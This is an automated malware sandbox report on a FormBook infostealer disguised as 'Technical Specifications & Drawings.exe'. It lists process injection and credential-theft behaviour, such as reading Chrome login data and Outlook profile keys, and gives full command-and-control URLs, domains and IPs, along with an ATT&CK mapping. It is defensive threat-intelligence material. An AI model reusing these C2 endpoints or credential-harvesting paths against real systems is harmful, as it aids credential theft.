          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets13
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680337 Sample: Technical Specifications & ... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 31 www.fundycases.com 2->31 33 td-balancer-199-15-163-148.wixdns.net 2->33 35 3 other IPs or domains 2->35 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 9 Technical Specifications & Drawings.exe 3 2->9         started        signatures3 process4 file5 23 Technical Specific... & Drawings.exe.log, ASCII 9->23 dropped 55 Injects a PE file into a foreign processes 9->55 13 Technical Specifications & Drawings.exe 9->13         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 13->16 injected process9 dnsIp10 25 www.esandcraic.com 67.223.117.72, 49809, 80 VIMRO-AS15189US United States 16->25 27 tomoptique.fr 109.234.162.62, 49780, 80 O2SWITCHFR France 16->27 29 8 other IPs or domains 16->29 37 System process connects to network (likely due to code injection or exploit) 16->37 20 control.exe 13 16->20         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Deletes itself after installation 20->51 53 2 other signatures 20->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Technical Specifications & Drawings.exe32%VirustotalBrowse
          Technical Specifications & Drawings.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon
          Technical Specifications & Drawings.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.Technical Specifications & Drawings.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          boshi-eg.online12%VirustotalBrowse
          mexc-event-partner.site6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.mexc-event-partner.site/02pi/100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.tomoptique.fr/02pi/100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          boshi-eg.online
          		67.23.226.119
          		truetrueunknown
          tomoptique.fr
          		109.234.162.62
          		truetrue
            		unknown
            mexc-event-partner.site
            		184.168.107.80
            		truetrueunknown
            www.kirchhoff-darryl.com
            		107.155.208.43
            		truetrue
              		unknown
              www.esandcraic.com
              		67.223.117.72
              		truetrue
                		unknown
                td-balancer-199-15-163-148.wixdns.net
                		199.15.163.148
                		truefalse
                  		unknown
                  www.mexc-event-partner.site
                  		unknown
                  		unknowntrue
                    		unknown
                    www.fundycases.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.gzkanglongkeji.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.boshi-eg.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tomoptique.fr
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mexc-event-partner.site/02pi/true
                            • Avira URL Cloud: malware
                            		unknown
                            www.tomoptique.fr/02pi/true
                            • Avira URL Cloud: malware
                            		low

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.tiro.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.goodfont.co.krTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                109.234.162.62
                                                		tomoptique.frFrance
                                                		50474O2SWITCHFRtrue
                                                107.155.208.43
                                                		www.kirchhoff-darryl.comUnited States
                                                		4686BEKKOAMEBEKKOAMEINTERNETINCJPtrue
                                                67.223.117.72
                                                		www.esandcraic.comUnited States
                                                		15189VIMRO-AS15189UStrue
                                                184.168.107.80
                                                		mexc-event-partner.siteUnited States
                                                		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                67.23.226.119
                                                		boshi-eg.onlineUnited States
                                                		33182DIMENOCUStrue

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680337
                                                Start date and time: 08/08/202212:26:092022-08-08 12:26:09 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Technical Specifications & Drawings.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@4/2@14/6
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 93.3% (good quality ratio 81.7%)
                                                • Quality average: 72%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 45
                                                • Number of non-executed functions: 166
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                12:27:15API Interceptor1x Sleep call for process: Technical Specifications & Drawings.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                67.223.117.72zH4aQ6xq4y.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?yXb=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==&7nWp=lTflE2MXJvwlQrEP
                                                SKM_20220108.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?mnfX=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==&hN6xJR=yDH8Z8V8m8Hp-P0p
                                                IMG-20022891.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?K0G45zjP=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==&oVPDwT=1b8X
                                                DHL-AWB2738393.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/m6us/?o8VtoDQx=qnvAUXVRo+UDjlH6PcZz5HQvoNom7eO+NcLgJ0G30EKAZP07BLar2atoi6AjeuTklMJLc7xJRIBcOBVpFdoD4AWTmFLm2d4rxlQ//qUH00zz&Yd_L1r=C48dlRF8
                                                PO202202AG7.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?-Zv=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==&oPSXj=2dtDM
                                                TT USD56,670.00.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?hT=4h6p6&sT=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==
                                                IMG-19072022.exeGet hashmaliciousBrowse
                                                • www.dianna36.com/kiz0/?nPqtz=LXjo++ipd81pxgfEnBM4pgj24RtHpqrRgRBCxA4csFADRk44Sk8Vf4oRLi0bmNgtxACglZVKwvV1H2snxj7Hg+00IOD2eo6LOA==&MJB=E8Ahrr8
                                                67.23.226.1191 Total New Invoices-Thursday January 21 2021.xlsmGet hashmaliciousBrowse
                                                • amirartstudio.com/oc87ak5.rar
                                                BRZ-080120 IZB-082220.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                BRZ-080120 IZB-082220.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                SeBC3n8MPd.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                UQnfEyFg60.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                3RrmiA1zbr.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                VVYkGYpRpN.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                X0to4uqzYZ.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                vmYBPkvvZ4.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                BiT2QHzHRu.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                Sjt4ag0DNj.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                glEquqXx49.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                VyAvURPO2I.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                ETwTnYbumU.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                f52tzt9ALR.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                l3qza2mRjp.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                RR8eKuFW7g.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                PS3bqQqFXd.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                qqcwTLMr6b.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/
                                                Tc5Dz963ly.docGet hashmaliciousBrowse
                                                • saimission.org/sai/fU/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                td-balancer-199-15-163-148.wixdns.netvbc.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                SWIFT_OR22311950_00012916_20220727205305_pdf.vbsGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                Sipari#U015f Metak # MGE-PO-2022-029, pdf.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://www.heathersettlement.net/Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                Bestellanfrage - 93816 - 27.07.22.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                Emrar Dis Ticaret ve Lojistik Payment Advice 46,273.15USD.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://previewoxlade.editorx.io/my-site-1Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                INV_GHHR0098_DSE.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                Bileddet.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://www.southtowna982.com/Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                0NoB6NOrRp.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                Unhonoured.comGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                VJjbjkQBMt_bin.jsGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://rebrand.ly/jiws2je/#lelani@slmlaw.co.zaGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                http://corderfaninedcward.org/Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://webdocsextcontrol.info/Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                https://www.construction-officebillings.com/Get hashmaliciousBrowse
                                                • 199.15.163.148
                                                gxO9R6edp4.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                payment advice_pdf_049584.exeGet hashmaliciousBrowse
                                                • 199.15.163.148
                                                gRe5TuuGiw.exeGet hashmaliciousBrowse
                                                • 199.15.163.148

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                BEKKOAMEBEKKOAMEINTERNETINCJPnotabotnet.i686Get hashmaliciousBrowse
                                                • 218.225.239.59
                                                botx.mipsGet hashmaliciousBrowse
                                                • 210.142.94.190
                                                onryo.x86Get hashmaliciousBrowse
                                                • 103.20.8.41
                                                31KcgdYvZ6Get hashmaliciousBrowse
                                                • 202.210.131.214
                                                JY23PmszXw.dllGet hashmaliciousBrowse
                                                • 124.109.108.104
                                                RrHgMcL534Get hashmaliciousBrowse
                                                • 202.210.131.229
                                                6uVsz9DuXEGet hashmaliciousBrowse
                                                • 218.225.239.17
                                                Jjge2zt20pGet hashmaliciousBrowse
                                                • 218.225.239.38
                                                sora.armGet hashmaliciousBrowse
                                                • 202.210.131.249
                                                N2aGMytHajGet hashmaliciousBrowse
                                                • 218.225.239.30
                                                pandora.mipsGet hashmaliciousBrowse
                                                • 210.142.110.220
                                                YOUR_RFQ.exeGet hashmaliciousBrowse
                                                • 107.155.208.251
                                                miori.i5Get hashmaliciousBrowse
                                                • 103.20.8.53
                                                shAwKMD85KGet hashmaliciousBrowse
                                                • 202.235.239.206
                                                rHTE6t3Zr6Get hashmaliciousBrowse
                                                • 210.142.110.222
                                                3Fsj0rnMljGet hashmaliciousBrowse
                                                • 202.210.131.236
                                                PfXFzX7HTlGet hashmaliciousBrowse
                                                • 218.225.240.36
                                                uYtea.x86Get hashmaliciousBrowse
                                                • 202.210.131.211
                                                NpWrONH7zFGet hashmaliciousBrowse
                                                • 202.210.131.247
